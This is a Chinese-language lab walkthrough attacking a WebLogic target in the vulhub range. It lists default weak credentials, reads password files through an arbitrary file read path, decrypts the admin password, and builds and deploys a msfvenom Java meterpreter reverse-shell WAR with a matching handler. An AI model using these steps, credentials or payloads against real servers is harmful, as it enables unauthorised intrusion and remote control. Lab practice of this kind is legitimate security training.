WebLogic 是 Oracle 公司开发的应用服务器,主要用作开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全漏洞,其中包括弱口令、任意文件上传、SSRF、反序列化漏洞等
vulhub:多个靶场的集合
systemctl stop firewalld.service
setenforce 0
systemctl restart docker.service
cd /var/local/vulhub-master/weblogic/weak_password
docker-compose up -d
[root@localhost weak_password]# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 5ebeb02ea02a vulhub/weblogic:10.3.6.0-2017 "startWebLogic.sh" 54 minutes ago Up 54 seconds 0.0.0.0:5556->5556/tcp, :::5556->5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp weak_password_weblogic_
http://192.168.10.5:7001/
docker-compose stop
[root@localhost weak_password]# docker-compose stop Stopping weak_password_weblogic_1 ... done
[root@localhost weak_password]# cd .. [root@localhost weblogic]# ls CVE-2017-10271 CVE-2018-2628 CVE-2018-2894 CVE-2020-14882 CVE-2023-21839 ssrf weak_password [root@localhost weblogic]# cd ssrf/ [root@localhost ssrf]# docker-compose up -d Starting ssrf_redis_1 ... done Starting ssrf_weblogic_1 ... done [root@localhost ssrf]#
weblogic弱口令:
用户名 | 密码 |
---|---|
system | password |
weblogic | weblogic |
admin | secruity |
joe | password |
mary | password |
system | sercurity |
wlcsystem | wlcsystem |
weblogic | Oracle@123 |
通过漏洞读取weblogic密钥及密文,使用AES解密出后台密码
密文绝对路径: /root/Oracle/Middleware/user_projects/domains/base_domain/security/Se rializedSystemIni.dat 密钥绝对路径: /root/Oracle/Middleware/user_projects/domains/base_domain/config/con fig.xml
漏洞接口路径:
http://192.168.10.5:7001/hello/file.jsp?path=/etc/passwd
请求:
响应:
config.xml是base_domain的全局配置文件
其中
地址:https://github.com/TideSec/Decrypt_Weblogic_Password 工具路径:Decrypt_Weblogic_Password-master\Tools5-weblogic_decrypt
创建.bat文件将其保存至工具目录
@echo off echo Starting the weblogic_decrypt.jar application... java -jar weblogic_decrypt.jar echo Application has ended. Press any key to exit. pause > nul
msfvenom -p java/meterpreter/reverse_tcp lhost=攻击者ip lport=4444 -f war -o java.war
点击左侧 部署->安装->上载文件->上传war包->(全部下一步)-> 完成
msfconsole use exploit/multi/handler set payload java/meterpreter/reverse_tcp set LHOST 192.168.10.128 set LPORT 4444 exploit
http://192.168.10.5:7001/java